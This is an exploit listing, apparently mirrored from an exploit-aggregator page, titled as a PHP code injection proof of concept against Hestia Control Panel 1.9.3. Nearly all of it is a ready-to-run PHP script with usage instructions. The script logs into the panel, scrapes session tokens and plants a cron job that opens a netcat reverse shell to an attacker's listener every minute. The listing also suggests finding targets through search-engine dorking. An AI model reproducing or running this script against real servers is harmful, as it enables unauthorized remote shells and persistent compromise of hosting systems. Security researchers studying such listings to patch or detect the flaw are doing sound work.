Share
## https://sploitus.com/exploit?id=PACKETSTORM:212869
=============================================================================================================================================
    | # Title     : Hestia Control Panel 1.9.3 PHP code injection Vulnerability                                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://hestiacp.com/                                                                                                       |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Code Description: This code is a PHP exploit that targets the cronjobs system on a specific server, by executing commands remotely after logging in.
    
       (Related : https://packetstorm.news/files/id/189606/ Related CVE numbers:  ) .
    	
    [+] save code as poc.php.
    
    [+] Usage: php script.php <url> <username> <password> <listener_ip> <listener_port>
    
    [+] PayLoad :
    
    
    <?php
    
    function login($url, $username, $password) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "$url/login/");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $token_response = curl_exec($ch);
        curl_close($ch);
        
        if (!preg_match('/<input type="hidden" name="token" value="(.*?)">/', $token_response, $matches)) {
            echo "Failed to retrieve login token\n";
            return [null, null];
        }
        
        $token = $matches[1];
        $postData = http_build_query([
            'token' => $token,
            'user' => $username
        ]);
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "$url/login/");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $username_response = curl_exec($ch);
        curl_close($ch);
        
        if (!preg_match('/<input type="hidden" name="token" value="(.*?)">/', $username_response, $matches)) {
            echo "Failed to retrieve password token\n";
            return [null, null];
        }
        
        $token = $matches[1];
        $postData = http_build_query([
            'token' => $token,
            'password' => $password
        ]);
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "$url/login/");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_HEADER, true);
        curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
        $password_response = curl_exec($ch);
        curl_close($ch);
        
        if (strpos($password_response, 'login') !== false) {
            echo "Login failed!\n";
            return [null, null];
        }
        
        echo "Login successful!\n";
        return ['cookies.txt', $token];
    }
    
    function create_cron($url, $cookieFile, $listener_ip, $listener_port, $token) {
        $cron_payload = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc $listener_ip $listener_port >/tmp/f";
        
        $postData = http_build_query([
            'token' => $token,
            'ok' => 'Add',
            'v_cmd' => $cron_payload,
            'v_min' => '*',
            'v_hour' => '*',
            'v_day' => '*',
            'v_month' => '*',
            'v_wday' => '*'
        ]);
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "$url/add/cron/");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
        curl_setopt($ch, CURLOPT_COOKIEFILE, $cookieFile);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $cron_response = curl_exec($ch);
        curl_close($ch);
        
        if (strpos($cron_response, 'cron') !== false) {
            echo "Cronjob successfully generated!\n";
            return true;
        }
        
        echo "Failed to create cronjob.\n";
        return false;
    }
    
    if ($argc < 6) {
        echo "Usage: php script.php <url> <username> <password> <listener_ip> <listener_port>\n";
        exit(1);
    }
    
    $url = $argv[1] ?? '';
    $username = $argv[2] ?? '';
    $password = $argv[3] ?? '';
    $listener_ip = $argv[4] ?? '';
    $listener_port = $argv[5] ?? '';
    
    list($cookieFile, $token) = login($url, $username, $password);
    if ($cookieFile) {
        if (create_cron($url, $cookieFile, $listener_ip, $listener_port, $token)) {
            echo "Cronjob created, waiting for connection...\n";
        }
    }
    
    
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================